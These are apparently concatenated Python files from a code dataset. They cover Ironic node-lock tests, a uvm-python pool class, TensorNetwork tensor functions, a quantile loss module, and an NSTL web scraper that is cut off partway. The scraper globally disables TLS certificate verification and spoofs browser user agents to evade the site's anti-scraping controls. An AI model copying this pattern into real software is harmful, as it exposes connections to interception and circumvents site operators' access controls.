1838503 | <filename>ironic/tests/conductor/test_task_manager.py
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for :class:`ironic.conductor.task_manager`."""
from testtools import matchers
from ironic.common import exception
from ironic.conductor import task_manager
from ironic.db import api as dbapi
from ironic.openstack.common import uuidutils
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base
from ironic.tests.db import utils
def create_fake_node(i):
    """Insert a test node with id *i* and a fresh UUID; return the UUID."""
    handle = dbapi.get_instance()
    node_dict = utils.get_test_node(id=i, uuid=uuidutils.generate_uuid())
    handle.create_node(node_dict)
    return node_dict['uuid']
def ContainsUUIDs(uuids):
    """Build a testtools matcher asserting that a task's resources carry
    exactly the given node UUIDs (in order)."""
    def _uuids_of(task):
        return [resource.node.uuid for resource in task.resources]

    return matchers.AfterPreprocessing(_uuids_of, matchers.Equals(uuids))
class TaskManagerTestCase(base.DbTestCase):
    """Exercise shared and exclusive node locking via task_manager.acquire."""

    def setUp(self):
        super(TaskManagerTestCase, self).setUp()
        self.dbapi = dbapi.get_instance()
        self.driver = mgr_utils.get_mocked_node_manager()

        # five fake nodes (ids 1..5); sorted UUIDs for stable comparisons
        self.uuids = [create_fake_node(i) for i in xrange(1, 6)]
        self.uuids.sort()

    def test_get_one_node(self):
        uuids = [self.uuids[0]]

        self.config(host='test-host')

        with task_manager.acquire(uuids) as task:
            node = task.resources[0].node
            self.assertEqual(uuids[0], node.uuid)
            # acquiring reserves the node for this conductor host
            self.assertEqual('test-host', node.reservation)

    def test_get_many_nodes(self):
        uuids = self.uuids[1:3]

        self.config(host='test-host')

        with task_manager.acquire(uuids) as task:
            self.assertThat(task, ContainsUUIDs(uuids))
            for node in [r.node for r in task.resources]:
                self.assertEqual('test-host', node.reservation)

    def test_get_nodes_nested(self):
        # disjoint node sets may be locked in nested contexts
        uuids = self.uuids[0:2]
        more_uuids = self.uuids[3:4]

        with task_manager.acquire(uuids) as task:
            self.assertThat(task, ContainsUUIDs(uuids))
            with task_manager.acquire(more_uuids) as another_task:
                self.assertThat(another_task, ContainsUUIDs(more_uuids))

    def test_get_locked_node(self):
        uuids = self.uuids[0:2]

        def _lock_again(u):
            # should raise NodeLocked before reaching this exception
            with task_manager.acquire(u):
                raise exception.IronicException("Acquired lock twice.")

        with task_manager.acquire(uuids) as task:
            self.assertThat(task, ContainsUUIDs(uuids))
            self.assertRaises(exception.NodeLocked,
                              _lock_again,
                              uuids)

    def test_get_shared_lock(self):
        uuids = self.uuids[0:2]

        # confirm we can elevate from shared -> exclusive
        with task_manager.acquire(uuids, shared=True) as task:
            self.assertThat(task, ContainsUUIDs(uuids))
            with task_manager.acquire(uuids, shared=False) as inner_task:
                self.assertThat(inner_task, ContainsUUIDs(uuids))

        # confirm someone else can still get a shared lock
        with task_manager.acquire(uuids, shared=False) as task:
            self.assertThat(task, ContainsUUIDs(uuids))
            with task_manager.acquire(uuids, shared=True) as inner_task:
                self.assertThat(inner_task, ContainsUUIDs(uuids))
class ExclusiveLockDecoratorTestCase(base.DbTestCase):
    """Exercise the @require_exclusive_lock decorator and single-node
    task convenience properties."""

    def setUp(self):
        super(ExclusiveLockDecoratorTestCase, self).setUp()
        self.dbapi = dbapi.get_instance()
        self.driver = mgr_utils.get_mocked_node_manager()
        self.uuids = [create_fake_node(123)]

    def test_require_exclusive_lock(self):
        # decorated free function must reject shared locks
        @task_manager.require_exclusive_lock
        def do_state_change(task):
            for r in task.resources:
                task.dbapi.update_node(r.node.uuid,
                                       {'power_state': 'test-state'})

        with task_manager.acquire(self.uuids, shared=True) as task:
            self.assertRaises(exception.ExclusiveLockRequired,
                              do_state_change,
                              task)

        with task_manager.acquire(self.uuids, shared=False) as task:
            do_state_change(task)

        for uuid in self.uuids:
            res = self.dbapi.get_node(uuid)
            self.assertEqual('test-state', res.power_state)

    # decorated bound method, used by the test below
    @task_manager.require_exclusive_lock
    def _do_state_change(self, task):
        for r in task.resources:
            task.dbapi.update_node(r.node.uuid,
                                   {'power_state': 'test-state'})

    def test_require_exclusive_lock_on_object(self):
        with task_manager.acquire(self.uuids, shared=True) as task:
            self.assertRaises(exception.ExclusiveLockRequired,
                              self._do_state_change,
                              task)

        with task_manager.acquire(self.uuids, shared=False) as task:
            self._do_state_change(task)

        for uuid in self.uuids:
            res = self.dbapi.get_node(uuid)
            self.assertEqual('test-state', res.power_state)

    def test_one_node_per_task_properties(self):
        # with exactly one node, node/driver/node_manager shortcuts work
        with task_manager.acquire(self.uuids) as task:
            self.assertEqual(task.node, task.resources[0].node)
            self.assertEqual(task.driver, task.resources[0].driver)
            self.assertEqual(task.node_manager, task.resources[0])

    def test_one_node_per_task_properties_fail(self):
        # with more than one node, the shortcuts raise AttributeError
        self.uuids.append(create_fake_node(456))
        with task_manager.acquire(self.uuids) as task:
            def get_node():
                return task.node

            def get_driver():
                return task.driver

            def get_node_manager():
                return task.node_manager

            self.assertRaises(AttributeError, get_node)
            self.assertRaises(AttributeError, get_driver)
            self.assertRaises(AttributeError, get_node_manager)
| StarcoderdataPython |
1894021 | #//
#//------------------------------------------------------------------------------
#// Copyright 2007-2011 Mentor Graphics Corporation
#// Copyright 2007-2010 Cadence Design Systems, Inc.
#// Copyright 2010 Synopsys, Inc.
#// Copyright 2019 <NAME> (tpoikela)
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//------------------------------------------------------------------------------
import collections
from .uvm_object import UVMObject
from ..macros import uvm_warning
class UVMPool(UVMObject):
    """
    Implements a class-based dynamic associative array. Allows sparse arrays to
    be allocated on demand, and passed and stored by reference.

    An internal pointer (`self.ptr`) supports first/next/prev/last style
    iteration over the insertion-ordered keys.
    """

    type_name = "uvm_pool"
    m_global_pool = None  # lazily created singleton, see get_global_pool()

    def __init__(self, name="", T=None):
        """
        Args:
            name (str): Name of the pool.
            T: Optional class used by get() to default-construct missing items.
        """
        UVMObject.__init__(self, name)
        self.pool = collections.OrderedDict()
        self.ptr = -1  # iteration pointer; -1 means "before the first key"
        self.T = T

    @classmethod
    def get_global_pool(cls):
        """
        Returns the singleton global pool. Unlike in SV, uvm-python has only one
        global pool.

        This allows items to be shared amongst components throughout the
        verification environment.

        Returns:
            UVMPool: Single global pool
        """
        if UVMPool.m_global_pool is None:
            UVMPool.m_global_pool = UVMPool("pool")
        return UVMPool.m_global_pool

    @classmethod
    def get_global(cls, key):
        """
        Returns the specified item instance from the global item pool.

        Args:
            key (str):
        Returns:
            any: Item matching the given key.
        """
        gpool = UVMPool.get_global_pool()
        return gpool.get(key)

    def get(self, key):
        """
        Returns the item with the given `key`.

        If no item exists by that key and a default type T was supplied,
        a new item is created for that key and returned; otherwise None.

        Args:
            key:
        Returns:
            any: Existing or newly created item, or None.
        """
        if key in self.pool:
            return self.pool[key]
        elif self.T is not None:
            self.pool[key] = self.T()
            return self.pool[key]
        return None

    def add(self, key, item):
        """Insert (or overwrite) `item` under `key`."""
        self.pool[key] = item

    def num(self):
        """Return the number of items in the pool."""
        return len(self.pool.keys())

    def keys(self):
        """Return a view of the pool's keys."""
        return self.pool.keys()

    def key_list(self):
        """Return the pool's keys as a list."""
        return list(self.pool.keys())

    def delete(self, key=None):
        """Remove the item under `key`, or clear the whole pool when `key`
        is None. Missing keys are ignored."""
        if key is None:
            # Re-create the same container type used by __init__; the
            # original assigned a plain dict literal here, which was
            # inconsistent with the OrderedDict set up in __init__.
            self.pool = collections.OrderedDict()
        else:
            if key in self.pool:
                del self.pool[key]

    def exists(self, key):
        """Return True if `key` is present in the pool."""
        return key in self.pool

    def last(self):
        """Move the pointer to the last key and return it, or False when
        the pool is empty."""
        keys = self.pool.keys()
        if len(keys) > 0:
            self.ptr = self.num() - 1
            return next(reversed(self.pool))
        else:
            return False

    def has_first(self):
        """Return True if the pool has a first (i.e. any) key."""
        return self.num() > 0

    def has_last(self):
        """Return True if the pool has a last (i.e. any) key."""
        return self.num() > 0

    def first(self):
        """Move the pointer to the first key and return it, or False when
        the pool is empty."""
        for k in self.pool:
            self.ptr = 0
            return k
        return False

    def has_next(self):
        """Return True if a key exists after the current pointer."""
        if self.ptr < (self.num() - 1):
            return True
        return False

    def next(self):
        """Advance the pointer and return the next key, or None at the end."""
        # Compare truthiness directly instead of "is True" (PEP 8).
        if self.has_next():
            self.ptr += 1
            key = list(self.pool.keys())[self.ptr]
            return key
        return None

    def has_prev(self):
        """Return True if a key exists before the current pointer."""
        if self.ptr > 0:
            return True
        return False

    def prev(self):
        """Step the pointer back and return the previous key, or None at
        the start."""
        if self.has_prev():
            self.ptr -= 1
            key = list(self.pool.keys())[self.ptr]
            return key
        return None

    def create(self, name=""):
        """Return a new, empty pool with the same default item type."""
        return UVMPool(name, self.T)

    def do_print(self, printer):
        """Print all items via `printer`, walking with the internal pointer."""
        while self.has_next():
            key = self.next()
            item = self.pool[key]
            if hasattr(item, 'convert2string'):
                printer.print_string(item.get_name(), item.convert2string())
            else:
                name = ""
                if hasattr(key, 'get_name'):
                    name = key.get_name()
                printer.print_generic(name, '', 0, str(item))

    def __len__(self):
        """len() operator."""
        return self.num()

    def __contains__(self, key):
        """Implements `x in pool`."""
        return key in self.pool

    def __setitem__(self, key, value):
        """Implements `pool[key] = value`."""
        self.pool[key] = value

    def __getitem__(self, key):
        """Implements `pool[key]`.

        Raises:
            IndexError: when the key is absent.
        """
        if key in self.pool:
            return self.pool[key]
        else:
            raise IndexError('No key found')
class UVMObjectStringPool(UVMPool):
    """
    Specialization of the generic `UVMPool` class for an associative array
    of `UVMObject`-based objects indexed by string.

    Specializations of this class include the `UVMEventPool` (a
    `UVMObjectStringPool` storing `UVMEvent`) and `UVMBarrierPool`
    (a `UVMObjectStringPool` storing `UVMBarrier`).
    """

    # Lazily-created singleton shared by get_global_pool()/get_global().
    m_global_pool = None
    type_name = "uvm_obj_str_pool"

    def __init__(self, name="", Constr=UVMObject):
        """
        Creates a new pool with the given `name`.

        Args:
            name (str): Name of the pool.
            Constr (class): Constructor used for building default objects
                in `get` when a key is absent.
        """
        UVMPool.__init__(self, name)
        self.Constructor = Constr

    def get_type_name(self):
        """
        Returns the type name of this object.

        Returns:
            str: Type name of this object.
        """
        return UVMObjectStringPool.type_name

    @classmethod
    def get_global_pool(cls):
        """
        Returns the singleton global pool, creating it on first use.

        This allows objects to be shared amongst components throughout the
        verification environment.

        Returns:
            UVMObjectStringPool: Global pool
        """
        if UVMObjectStringPool.m_global_pool is None:
            UVMObjectStringPool.m_global_pool = UVMObjectStringPool("global_pool")
        return UVMObjectStringPool.m_global_pool

    @classmethod
    def get_global(cls, key):
        """
        Returns the specified item instance from the global item pool.

        Args:
            key (str): Key used for getting the item from global pool.

        Returns:
            any: Object matching the key in the global pool.
        """
        gpool = UVMObjectStringPool.get_global_pool()
        return gpool.get(key)

    def get(self, key):
        """
        Returns the object item at the given string `key`, creating (and
        storing) a new `self.Constructor(key)` instance when no item exists
        for that key.

        Args:
            key (str): Key used for getting the item.

        Returns:
            any: Item matching the key. If no match, returns new object.
        """
        if key not in self.pool:
            self.pool[key] = self.Constructor(key)
        return self.pool[key]

    def delete(self, key):
        """
        Removes the item with the given string `key` from the pool.

        Warns (and leaves the pool unchanged) when the key does not exist.

        Args:
            key (str): Key used for removing the item.
        """
        if not self.exists(key):
            uvm_warning("POOLDEL", "delete: key '{}' doesn't exist".format(key))
            return
        # Bug fix: the original called self.delete(key) here, which recursed
        # into this very method forever. Delegate to the base-class delete.
        UVMPool.delete(self, key)

    def do_print(self, printer):
        """
        Prints every entry of the pool through the given printer.

        Args:
            printer (UVMPrinter): Printer used for printing
        """
        key = ""
        num_keys = len(list(self.pool.keys()))
        printer.print_array_header("pool", num_keys, "aa_object_string")
        if self.has_first():
            key = self.first()
            while True:
                printer.print_object("[" + key + "]", self.pool[key], "[")
                if self.has_next():
                    key = self.next()
                else:
                    break
        printer.print_array_footer()
class UVMEventPool(UVMObjectStringPool):
    """`UVMObjectStringPool` specialization storing `UVMEvent` objects."""
    def __init__(self, name=""):
        # Local import avoids a circular dependency at module load time.
        from .uvm_event import UVMEvent
        UVMObjectStringPool.__init__(self, name, UVMEvent)
class UVMBarrierPool(UVMObjectStringPool):
    """`UVMObjectStringPool` specialization storing `UVMBarrier` objects."""
    def __init__(self, name=""):
        # Local import avoids a circular dependency at module load time.
        from .uvm_barrier import UVMBarrier
        UVMObjectStringPool.__init__(self, name, UVMBarrier)
| StarcoderdataPython |
1965393 | <gh_stars>0
# Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Text, Union, Optional, Sequence, Tuple
from tensornetwork.tensor import Tensor
from tensornetwork import ncon_interface
def _check_backends(tensors: Sequence[Tensor], fname: str) -> Tuple[bool, str]:
""" Checks that each of tensors has the same backend, returning True and an
empty string if so, or False and an error string if not.
Args:
tensors: The list of tensors whose backends to check.
fname: The name of the calling function, which will go into the errstring.
Returns:
(flag, errstr): Whether all backends agree, and an error message if not.
"""
backend_names = [tensor.backend.name for tensor in tensors]
backends_check = [backend_names[0] == name for name in backend_names[1:]]
all_backends_same = all(backends_check)
errstr = ""
if not all_backends_same:
errstr = "All Tensors fed to " + fname + "must have the same backend."
errstr += "Backends were: \n"
errstr += str([name + "\n" for name in backend_names])
return all_backends_same, errstr
def tensordot(a: Tensor, b: Tensor,
              axes: Union[int, Sequence[Sequence[int]]]) -> Tensor:
    """Do a tensordot (contraction) of Tensors `a` and `b` over the given axes.

    The behaviour of this function largely matches that of np.tensordot.

    Args:
      a: A Tensor.
      b: Another Tensor.
      axes: Two lists of integers. These values are the contraction
        axes. A single integer may also be supplied, in which case both
        tensors are contracted over this axis.
    Raises:
      ValueError, if a and b have different backends.
    Returns:
      The result of the tensordot, a Tensor.
    """
    if a.backend.name != b.backend.name:
        errstr = "Tried to Tensordot Tensors with differing backends \n"
        # Bug fix: the original wrote `name + "and "`, producing e.g.
        # "numpyand jax" in the error message.
        errstr += a.backend.name + " and " + b.backend.name + "."
        raise ValueError(errstr)
    out_array = a.backend.tensordot(a.array, b.array, axes)
    out_tensor = Tensor(out_array, backend=a.backend)
    return out_tensor
def reshape(tensor: Tensor, new_shape: Sequence[int]) -> Tensor:
    """Return `tensor` reshaped to `new_shape`.

    Args:
      tensor: The Tensor to reshape.
      new_shape: The target shape.
    Returns:
      The reshaped Tensor.
    """
    return tensor.reshape(new_shape)
def transpose(tensor: Tensor, perm: Optional[Sequence[int]] = None) -> Tensor:
    """Return a new Tensor with axes permuted according to `perm`.

    Args:
      tensor: The Tensor to transpose.
      perm: The permutation. If None (default) the index order is reversed.
    Returns:
      The transposed Tensor.
    """
    return tensor.transpose(perm=perm)
def take_slice(tensor: Tensor, start_indices: Tuple[int, ...],
               slice_sizes: Tuple[int, ...]) -> Tensor:
    """Return the slice of `tensor` that begins at `start_indices` and
    extends `slice_sizes` along each axis.

    Args:
      tensor: A Tensor.
      start_indices: Tuple of integers denoting start indices of the slice.
      slice_sizes: Tuple of integers denoting size of the slice per axis.
    Returns:
      The slice, a Tensor.
    """
    backend = tensor.backend
    sliced_array = backend.slice(tensor.array, start_indices, slice_sizes)
    return Tensor(sliced_array, backend=backend)
def shape(tensor: Tensor) -> Tuple[int, ...]:
    """Return the shape of `tensor` as a tuple of integers.

    Args:
      tensor: A Tensor.
    Returns:
      The shape of the input Tensor.
    """
    return tensor.shape
def sqrt(tensor: Tensor) -> Tensor:
    """Return the elementwise square root of `tensor`."""
    backend = tensor.backend
    return Tensor(backend.sqrt(tensor.array), backend=backend)
def outer(tensor1: Tensor, tensor2: Tensor) -> Tensor:
    """Return the outer product of the two given Tensors.

    Raises:
      ValueError: if the two Tensors use different backends.
    """
    same_backend, errstr = _check_backends([tensor1, tensor2], "outer")
    if not same_backend:
        raise ValueError(errstr)
    backend = tensor1.backend
    product = backend.outer_product(tensor1.array, tensor2.array)
    return Tensor(product, backend=backend)
def einsum(expression: Text, *tensors: Tensor, optimize: bool) -> Tensor:
    """Evaluate the Einstein-summation `expression` over `tensors`.

    Raises:
      ValueError: if the Tensors use different backends.
    """
    same_backend, errstr = _check_backends(tensors, "einsum")
    if not same_backend:
        raise ValueError(errstr)
    backend = tensors[0].backend
    operands = [t.array for t in tensors]
    summed = backend.einsum(expression, *operands, optimize=optimize)
    return Tensor(summed, backend=backend)
def conj(tensor: Tensor) -> Tensor:
    """Return the complex conjugate of `tensor`.

    Args:
      tensor: A Tensor.
    Returns:
      The complex conjugated Tensor.
    """
    return tensor.conj()
def hconj(tensor: Tensor, perm: Optional[Sequence[int]] = None) -> Tensor:
    """Return the Hermitian conjugate: the complex conjugate transposed by
    the permutation `perm`.

    Args:
      tensor: The Tensor to conjugate.
      perm: The permutation. If None (default) the index order is reversed.
    Returns:
      The Hermitian conjugated Tensor.
    """
    return tensor.hconj(perm=perm)
def sin(tensor: Tensor) -> Tensor:
    """Return the elementwise sine of `tensor`."""
    backend = tensor.backend
    return Tensor(backend.sin(tensor.array), backend=backend)
def cos(tensor: Tensor) -> Tensor:
    """Return the elementwise cosine of `tensor`."""
    backend = tensor.backend
    return Tensor(backend.cos(tensor.array), backend=backend)
def exp(tensor: Tensor) -> Tensor:
    """Return the elementwise exponential of `tensor`."""
    backend = tensor.backend
    return Tensor(backend.exp(tensor.array), backend=backend)
def log(tensor: Tensor) -> Tensor:
    """Return the elementwise natural logarithm of `tensor`."""
    backend = tensor.backend
    return Tensor(backend.log(tensor.array), backend=backend)
def diagonal(tensor: Tensor, offset: int = 0, axis1: int = -2,
             axis2: int = -1) -> Tensor:
    """Extract the offset'th diagonal from the matrix slice of `tensor`
    indexed by (axis1, axis2).

    Args:
      tensor: A Tensor.
      offset: Offset of the diagonal from the main diagonal.
      axis1, axis2: Indices of the matrix slice to extract from.
    Returns:
      A 1D Tensor storing the elements of the selected diagonal.
    """
    backend = tensor.backend
    diag = backend.diagonal(tensor.array, offset=offset, axis1=axis1,
                            axis2=axis2)
    return Tensor(diag, backend=backend)
def diagflat(tensor: Tensor, k: int = 0) -> Tensor:
    """Flatten `tensor` and place its elements on the k'th diagonal of a new
    (tensor.size + k, tensor.size + k) Tensor of zeros.

    Args:
      tensor: A Tensor.
      k: The elements of tensor will be stored at this diagonal.
    Returns:
      A (tensor.size + k, tensor.size + k) Tensor with the elements of
      `tensor` on its kth diagonal.
    """
    backend = tensor.backend
    return Tensor(backend.diagflat(tensor.array, k=k), backend=backend)
def trace(tensor: Tensor, offset: int = 0, axis1: int = -2,
          axis2: int = -1) -> Tensor:
    """Sum the entries of the offset'th diagonal of the matrix slice of
    `tensor` indexed by (axis1, axis2).

    Args:
      tensor: A Tensor.
      offset: Offset of the diagonal from the main diagonal.
      axis1, axis2: Indices of the matrix slice to extract from.
    Returns:
      The trace as a Tensor.
    """
    backend = tensor.backend
    summed = backend.trace(tensor.array, offset=offset, axis1=axis1,
                           axis2=axis2)
    return Tensor(summed, backend=backend)
def ncon(
    tensors: Sequence[Tensor],
    network_structure: Sequence[Sequence[Union[str, int]]],
    con_order: Optional[Sequence] = None,
    out_order: Optional[Sequence] = None,
    check_network: bool = True,
) -> Tensor:
    r"""Contract a list of tn.Tensor according to a tensor network
    specification.

    The network is provided as one list of edge labels per tensor. Labels
    may be numbers or strings. Negative numbers and strings prefixed with a
    hyphen ('-') are open labels and remain uncontracted; positive numbers
    and unprefixed strings are closed labels and are contracted. A repeated
    open label is treated as an open batch label; a repeated closed label as
    a closed batch label. Open batch labels are collapsed into a single
    dimension and closed batch labels are summed over.

    If `out_order` is None, output labels are ordered by descending number
    ordering then ascending ASCII ordering, numbers before strings; e.g.
    [[-1, 1, '-rick', '2', -2], [-2, '2', 1, '-morty']] yields the order
    [-1, -2, '-morty', '-rick']. Otherwise the result is transposed into
    `out_order`. If `con_order` is None, number labels are contracted in
    ascending order followed by string labels in ascending ASCII order;
    otherwise `con_order` is followed.

    Examples - matrix multiplication and matrix trace:

    .. code-block:: python

      A = np.array([[1.0, 2.0], [3.0, 4.0]])
      B = np.array([[1.0, 1.0], [0.0, 1.0]])
      ncon([A, B], [(-1, 1), (1, -2)])
      ncon([A], [(1, 1)])  # 5.0

    Note:
      Disallowing `0` as an edge label is legacy behaviour; see the
      `original NCON implementation`_.

    .. _original NCON implementation:
      https://arxiv.org/abs/1402.0939

    Args:
      tensors: List of `Tensors`.
      network_structure: List of lists specifying the network structure.
      con_order: List of edge labels specifying the contraction order.
      out_order: List of edge labels specifying the output order.
      check_network: Boolean flag. If `True` check the network.
    Returns:
      The result of the contraction as a `Tensor`.
    """
    same_backend, errstr = _check_backends(tensors, "ncon")
    if not same_backend:
        raise ValueError(errstr)
    backend = tensors[0].backend
    arrays = [t.array for t in tensors]
    contracted = ncon_interface.ncon(arrays, network_structure,
                                     con_order=con_order,
                                     out_order=out_order,
                                     check_network=check_network,
                                     backend=backend)
    return Tensor(contracted, backend=backend)
def sign(tensor: Tensor) -> Tensor:
    """Return the elementwise sign of `tensor`."""
    backend = tensor.backend
    return Tensor(backend.sign(tensor.array), backend=backend)
# pylint: disable=redefined-builtin
def abs(tensor: Tensor) -> Tensor:
""" Returns the absolute value of the elements of Tensor.
"""
backend = tensor.backend
result = backend.abs(tensor.array)
return Tensor(result, backend=backend)
def pivot(tensor: Tensor, pivot_axis: int = -1) -> Tensor:
    """Reshape `tensor` into a matrix about `pivot_axis`.

    Equivalent to
    tensor.reshape(prod(tensor.shape[:pivot_axis]),
                   prod(tensor.shape[pivot_axis:])).

    Args:
      tensor: The input tensor.
      pivot_axis: Axis to pivot around.
    """
    backend = tensor.backend
    return Tensor(backend.pivot(tensor.array, pivot_axis=pivot_axis),
                  backend=backend)
def kron(tensorA: Tensor, tensorB: Tensor, pivot_axisA: int = -1,
         pivot_axisB: int = -1) -> Tensor:
    """
    Compute the Kronecker product of tensorA and tensorB.

    Both tensors are first reshaped into matrices about pivot_axisA and
    pivot_axisB respectively; the Kronecker product of those matrices is
    computed and reshaped to the concatenated shape of tensorA and tensorB
    (e.g. tensorA -> (2, 3); tensorB -> (4, 5); result -> (2, 3, 4, 5)).

    Raises:
      ValueError: if the two tensors use different backends.
    """
    # Bug fix: the original checked [tensorA, tensorA], so a backend
    # mismatch with tensorB was never detected.
    tensors = [tensorA, tensorB]
    all_backends_same, errstr = _check_backends(tensors, "kron")
    if not all_backends_same:
        raise ValueError(errstr)
    backend = tensorA.backend
    matrixA = pivot(tensorA, pivot_axis=pivot_axisA)
    matrixB = pivot(tensorB, pivot_axis=pivot_axisB)
    arr = backend.einsum("ij,kl->ikjl", matrixA.array, matrixB.array)
    full_shape = tuple(list(tensorA.shape) + list(tensorB.shape))
    return Tensor(arr, backend=backend).reshape(full_shape)
| StarcoderdataPython |
6667027 | from typing import List, Optional, Tuple
import numpy as np
import torch
import torch.nn as nn
from gluonts.core.component import validated
class QuantileLoss(nn.Module):
    """Weighted pinball (quantile) loss averaged over a set of quantiles."""

    @validated()
    def __init__(
        self,
        quantiles: List[float],
        quantile_weights: Optional[List[float]] = None,
    ) -> None:
        """
        Args:
            quantiles: quantile levels in (0, 1), one per prediction column.
            quantile_weights: per-quantile weights; defaults to uniform
                1/num_quantiles when empty or None.
        """
        super().__init__()
        self.quantiles = quantiles
        self.num_quantiles = len(quantiles)
        self.quantile_weights = (
            [1.0 / self.num_quantiles for i in range(self.num_quantiles)]
            if not quantile_weights
            else quantile_weights
        )

    def forward(self, y_true: torch.Tensor, y_pred: torch.Tensor, sample_weight=None):
        """Compute the weighted quantile loss.

        Args:
            y_true: target values.
            y_pred: predictions with one trailing slice per quantile.
            sample_weight: optional per-sample weights applied to the loss.
        Returns:
            The (optionally sample-weighted) mean quantile loss.
        """
        # Split the prediction tensor into one slice per quantile level.
        if self.num_quantiles > 1:
            y_pred_all = torch.chunk(y_pred, self.num_quantiles, dim=-1)
        else:
            y_pred_all = [y_pred]
        qt_loss = []
        for i, y_pred_q in enumerate(y_pred_all):
            q = self.quantiles[i]
            weighted_qt = (
                self.compute_quantile_loss(y_true, y_pred_q.squeeze(-1), q)
                * self.quantile_weights[i]
            )
            qt_loss.append(weighted_qt)
        stacked_qt_losses = torch.stack(qt_loss, dim=-1)
        sum_qt_loss = torch.mean(stacked_qt_losses, dim=-1)
        if sample_weight is not None:
            # Bug fix: the original returned `sample_weight * sum`, which
            # multiplied by the Python builtin `sum` function instead of the
            # computed loss tensor (a TypeError at runtime).
            return sample_weight * sum_qt_loss
        else:
            return sum_qt_loss

    @staticmethod
    def compute_quantile_loss(
        y_true: torch.Tensor, y_pred_p: torch.Tensor, p: float
    ) -> torch.Tensor:
        """Pinball loss at level `p`: 2 * (p*(y-ŷ)+ + (1-p)*(ŷ-y)+)."""
        under_bias = p * torch.clamp(y_true - y_pred_p, min=0)
        over_bias = (1 - p) * torch.clamp(y_pred_p - y_true, min=0)
        qt_loss = 2 * (under_bias + over_bias)
        return qt_loss
class ProjectParams(nn.Module):
    """Linear projection producing one output column per quantile level."""
    @validated()
    def __init__(self, in_features, num_quantiles):
        super().__init__()
        # One output per requested quantile.
        self.projection = nn.Linear(in_features=in_features, out_features=num_quantiles)
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Apply the linear projection to the last dimension of `x`."""
        return self.projection(x)
class QuantileOutput:
    """Factory bundling a quantile loss and its matching projection layer."""
    @validated()
    def __init__(
        self,
        input_size,
        quantiles: List[float],
        quantile_weights: Optional[List[float]] = None,
    ) -> None:
        # Size of the hidden features fed into the projection layer.
        self.input_size = input_size
        self.quantiles = quantiles
        self.quantile_weights = quantile_weights
    def get_loss(self) -> nn.Module:
        """Build a QuantileLoss configured with these quantiles/weights."""
        return QuantileLoss(
            quantiles=self.quantiles, quantile_weights=self.quantile_weights
        )
    def get_quantile_proj(self) -> nn.Module:
        """Build the projection mapping input_size -> one output per quantile."""
        return ProjectParams(
            in_features=self.input_size, num_quantiles=len(self.quantiles)
        )
| StarcoderdataPython |
5018170 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: <NAME>
@Date: Arg 10, 2020
"""
# Import necessary packages
import os
import ssl
import json
import time
import requests
import numpy as np
import pandas as pd
from urllib import request
from bs4 import BeautifulSoup
from random import randint
import urllib3
import threading
# Disable all kinds of warnings
urllib3.disable_warnings()
# Avoid SSL Certificate to access the HTTP website
ssl._create_default_https_context = ssl._create_unverified_context
def read_url(ID: str) -> str:
    """
    Fetch the term-detail page for the given ID and return its body.

    Retries up to 10 times on any request failure.

    :param ID: The ID of the website
    :return contents: The contents of the website ('' if every attempt failed)
    """
    # URL of the website + ID for every word website
    url = 'https://www.nstl.gov.cn/execute?target=nstl4.search4&function=paper/pc/detail&id=C0200' + ID
    # A fake device to avoid the Anti reptile
    USER_AGENTS = [
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
        "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
        "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
        "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
        "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
